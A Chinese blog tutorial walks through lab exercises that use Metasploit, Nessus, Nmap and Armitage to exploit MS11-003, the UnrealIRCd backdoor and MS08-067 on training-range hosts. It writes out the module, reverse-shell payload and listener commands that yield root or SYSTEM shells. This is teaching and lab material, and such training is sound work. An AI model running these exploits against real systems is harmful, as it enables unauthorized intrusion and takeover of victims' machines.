渗透测试-Metasploit实战

攻击工具

Nessus

Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus 6.0 以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。

服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。Nessus自带大量安全检查插件能够满足一般用户的安全评估任务需要,如果有特殊需要也可以将自己开发的安全检查插件集成到Nessus中。和其他安全扫描工具相比,Nessus主要优势在于免费、扩展性强,容易使用以及能够对目标系统进行全面的漏洞扫描。
在这里插入图片描述
默认状态下, Nessus扫描完成以后,会生成一份详细的报告,报告里会将扫描结果按照危险系数高低分成高危漏洞、中危漏洞、低危漏洞三类,我们一般重点关注高危漏洞,中危漏洞利用条件会比较苛刻,低危漏洞基本没有利用的可能。查看高危漏洞详情,根据漏洞简介信息使用Google搜索是否存在已知的Exp和攻击方法可以提高安全测试效率。

Metasploit

Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一,它彻底改变了我们执行安全测试的方式。Metasploit适用于所有流行的操作系统,Kali Linux则直接预装了Metasploit框架和运行在框架上的其他第三方工具。

Metasploit Framework(简称MSF)是一个免费的、可下载的渗透测试框架,它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

相关术语解释
Exploit攻击代码或程序;每个漏洞都有对应的漏洞利用程序;Metasploit有超过 1700 个漏洞利用程序
Payload攻击载荷;用于建立攻击者和受害者机器直接的连接;Metasploit有超过 500个有效攻击载荷
Module模块化结构;模块化的架构的好处是可以很容易的将自己写的利用程序和工具集成到框架中

Armitage

Armitage是一款Java写的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。

攻击方法

使用Armitage攻击目标主机一般会经历目标网络扫描、目标主机信息搜集、目标主机攻击模块搜索三个阶段。

  1. 目标网络扫描是为了确定目标主机所在网络结构的网络拓扑,为后续目标主机信息搜索和攻击奠定基础。
  2. 目标主机信息搜索是为了收集目标主机的漏洞信息,根据收集到的漏洞信息可以利用Armitage在Metasploit中自动搜索合适的攻击模块。
  3. 目标主机攻击模块搜索主要方法是依据发现的漏洞信息寻找可以突破目标系统的现有漏洞利用模块,为具体的攻击方案制定提供尽可能多的可靠支撑。

通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。

Win7主机

RCE漏洞

漏洞名称:Microsoft Internet Explorer 内存远程代码执行漏洞
CVE编号:CVE-2010-3971
漏洞编号:MS11-003
发布日期:2011-02-08
微软公布:https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-003
影响系统
Microsoft Internet Explorer 8.x
Microsoft Internet Explorer 7.x
Microsoft Internet Explorer 6.x
漏洞描述
Internet Explorer是Windows操作系统中默认捆绑的WEB浏览器。IE在处理畸形的CSS文件引用及对象事件时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页在用户系统中执行任意指令或造成拒绝服务。

危害】攻击者成功利用此漏洞可获取与当前用户相同的权限。即如果用户以管理员身份登录,攻击者可利用此漏洞完全控制受影响系统。攻击者进一步可安装恶意程序;查看、更改或上传数据;或以完全用户权限创建新账号。

实验环境

下文将介绍合天网安实验室的一个靶场(Metasploit攻击win7实例 )攻击过程,靶场链接:http://www.hetianlab.com/expc.do?ce=3971a5c7-6a41-441e-b5a0-6193b9c5c5ec
在这里插入图片描述

Nessus漏扫

为了对目标Win7主机(IP:10.1.1.129)进行攻击,首先可使用Nessus漏扫工具收集下主机是否存在可利用的漏洞信息。

1、在CMD中查看并确认Win7主机IP和用户,并关闭Win7系统的防火墙:
在这里插入图片描述
2、查看并确认攻击者Kali主机的登陆用户及网络配置信息:
在这里插入图片描述
3、在Nessus官网下载(短网址:http://sina.lt/9Pp)适合Kali linux的安装程序。下载之后,拷贝到Kali linux主机上(实验机已为我们下载好),运行下列命令进行安装:
在这里插入图片描述
在这里插入图片描述

4、输入以下命令,启动Nessus服务,如下图所示:
在这里插入图片描述
5、在浏览器中输入https://127.0.0.1:8834/访问Nessus平台:
在这里插入图片描述
6、登录的账号密码在Kali主机桌面文件夹Nessus下(账号YoYo/密码heetian),登录后新建一个漏洞扫描任务,如下:
在这里插入图片描述
7、配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描,如下图所示:
在这里插入图片描述8、扫描结束后,Nessus会很直观的显示出目标网段的安全情况,下图显示了整个网段4台主机的的安全信息:
在这里插入图片描述

9、重点关注10.1.1.129主机(即Win7靶机),Nessus扫描出该主机存在1个致命漏洞、1个高危漏洞,如下图所示:
在这里插入图片描述
10、查看致命漏洞,Nessus给出了该漏洞的介绍、风险信息、解决方案等详细信息,Google搜索是否存在已知的漏洞利用Exp。
在这里插入图片描述

Metasploit攻击

上面扫描得到Win7主机系统存在MS11_030解析漏洞,但是该漏洞利用条件较为苛刻,因此下面选择MS11_003 IE CSS Import漏洞来演示如何通过诱骗攻击者点击我们精心构造的含有攻击代码的网页来实现系统入侵。

1、在Kali主机控制台中执行命令“msfconsole”,启动metasploit,如下图所示:
在这里插入图片描述2、运行命令:“use exploit/windows/browser/ms11_003_ie_css_import”选择漏洞利用EXP,如下图所示:
在这里插入图片描述
3、运行命令:show options,查看配置选项,如下图所示:
在这里插入图片描述4、运行命令:set URIPATH baidu.com,设置生成的恶意网页的URI为baidu.com,如下图所示:
在这里插入图片描述
5、为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080,运行命令:set SRVPORT 8060,如下图所示:
在这里插入图片描述
6、 运行命令:set PAYLOAD windows/meterpreter/reverse_tcp设置攻击负载,如下图所示:
在这里插入图片描述7、运行命令:show options,查看配置选项,如下图所示:
在这里插入图片描述
8、运行命令: set LHOST 10.1.1.128,设置LHOST以绑定本地IP,如下图所示:
在这里插入图片描述
9、为避免端口冲突,设置LPORT, 运行命令:set LPORT 8866,如下图所示:
在这里插入图片描述
10、运行命令:exploit,开始进行攻击,已生成恶意网页,只等受害者访问我们构造的恶意网页:
在这里插入图片描述
11、在 Win7靶机打开IE浏览器,访问地址http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页,如下图所示:
在这里插入图片描述
12、此时攻击机Metasploit显示如下图所示信息,表明攻击成功:
在这里插入图片描述13、 验证攻击是否成功。使用命令sessions列出当前成功建立的回话,接着使用命令sessions –i 2 进入2号会话,然后使用命令getuid 查看攻击者的身份:
在这里插入图片描述
14、可见当前已经可以以Win7靶机管理员Administrator的身份执行任意命令,继续执行以下命令验证下:
在这里插入图片描述在这里插入图片描述
至此,攻击结束。我们成功利用MSF对MS11_003漏洞进行利用,实现对目标靶机的远程任意命令执行攻击。

Linux主机

后门漏洞

漏洞名称:UnrealIRCd 后门未授权访问漏洞
CVE编号:CVE-2010-2075
发布日期:2010-06-18
影响系统
Unrealircd:Unrealircd:3.2.8.1:::
漏洞描述
2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的修改(特洛伊木马),远程攻击者可执行任意命令。

实验环境

下文将介绍合天网安实验室的一个靶场(Metasploit攻击linux实例 )攻击过程,靶场链接:http://www.hetianlab.com/expc.do?ce=1a3ed230-d673-4f65-8955-42fb0c84bfec
在这里插入图片描述

Nmap扫描

1、查看并确认漏洞主机的登录用户及网络配置信息,如下:
在这里插入图片描述
2、查看并确认攻击者主机登陆用户及网络配置信息,如下:
在这里插入图片描述
3、利用Nmap命令: nmap -sT -v 10.1.1.136 扫描漏洞主机开放的端口信息,扫描结果如下:
在这里插入图片描述
4、漏洞主机开启了大量的端口,其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机:
在这里插入图片描述

Metasploit攻击

1、执行“msfconsole”命令启动MSF:
在这里插入图片描述
2、 执行“search unrealircd”命令搜索关于UnrealIRCD漏洞的利用信息:
在这里插入图片描述
3、 执行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP:
在这里插入图片描述
4、执行’show options’ 命令查看该exploit的参数设置信息,发现执行该EXP前可以配置漏洞主机的IP和端口:
在这里插入图片描述
5、执行“set RHOST 10.1.1.136 ”命令设置漏洞主机IP(该EXP默认端口为6667,与Metasploitable2漏洞主机开启IRC服务的端口一致,所以不用修改端口):
在这里插入图片描述
6、执行“exploit”命令,开始进行攻击,如下成功建立Shell会话:
在这里插入图片描述
7、验证shell权限,运行linux系统命令“whoami”,回显“root”说明当前shell的权限是root权限,可进行任意操作而不受权限控制:
在这里插入图片描述至此,攻击结束。我们成功借助MSF,利用UnrealIRCd后门漏洞攻击漏洞主机。

MSF图形化

溢出漏洞

漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞
CVE编号:CVE-2008-4250
漏洞编号:MS08-067
发布日期:2008-10-22
补丁编号:KB958644
微软公布:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067
影响系统
Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta
漏洞描述
攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料(特制的 RPC 请求)到该端口,通过MSRPC接口调用Server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机。

实验环境

下文将介绍合天网安实验室的一个靶场(Metasploit攻击winXP实例 )的攻击过程,靶场链接:http://www.hetianlab.com/expc.do?ce=68b9b3ad-2a0e-439b-b775-7822516a4d2d

在这里插入图片描述

MSF信息搜集

1、查看XPSP3漏洞主机的登录用户及网络配置信息,并关闭防火墙(为了更好的演示攻击):
在这里插入图片描述
2、查看攻击者主机登陆用户及网络配置信息:
在这里插入图片描述

【注意】Metasploit默认使用PostgreSQL存储渗透测试所需的数据表,所以在启动Armitage之前需要首先启动PostgreSQL服务和Metasploit服务,然后再启动Armitage。

3、执行service postgresql start 命令启动PostgreSQL服务:
在这里插入图片描述
4、执行 service metasploit start 命令在另一个终端启动Metasploit服务:
在这里插入图片描述
5、最后执行armitage命令启动Armitage,弹出对话框询问是否连接Metasploit的RPC信道,依次选择“connect”、“是”选项:
在这里插入图片描述
6、Armitage启动成功后主界面如下:
在这里插入图片描述7、利用Armitage对目标系统存在的网段(10.1.1.0/24)进行扫描:
在这里插入图片描述8、扫描结果显示,10.1.1.0/24网段一共还其他存在三台主机,其中10.1.1.130是所重点关注的目标主机:
在这里插入图片描述9、查看目标主机上开启的服务,选中目标主机10.1.1.130,右键选择Services:
在这里插入图片描述10、定向扫描目标主机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据。选中目标主机10.1.1.130,右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,对10.1.1.130主机进行漏洞扫描:
在这里插入图片描述11、利用上面扫描探测得到的漏洞信息,自动搜索Metasploit攻击模块库,寻找合适的攻击模块。选中10.1.1.130主机,依次选择菜单栏Attacks-Find Attacks,Armitage会开始自动搜索寻找合适的攻击模块:
在这里插入图片描述在这里插入图片描述

MSF图形化攻击

1、上面完成对目标主机的攻击模块搜索以后,选中10.1.1.130主机右键可以发现多了Attack菜单,这里选择SMB漏洞对XP目标主机进行攻击,依次选择如下菜单:
在这里插入图片描述2、 在弹出的攻击配置对话框中Targets处配置目标主机的系统,10.1.1.130主机是简体中文版xp系统,故选择如下选项:
在这里插入图片描述3、攻击完成后,目标主机的图标会发生明显变化:
在这里插入图片描述4、Armitage会自动建立一个驻留在内存的Shellcode(也就是Meterpreter),右键打开Meterpreter shell,输入getuid命令查看当前用户的权限是SYSTEM权限:
在这里插入图片描述
5、攻击者还可进一步查看并编辑被攻击主机的文件:
在这里插入图片描述其他进一步控制此处不再展示,借助Armitage进行MSF图形化的攻击至此结束。

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 黑客帝国 设计师:白松林 返回首页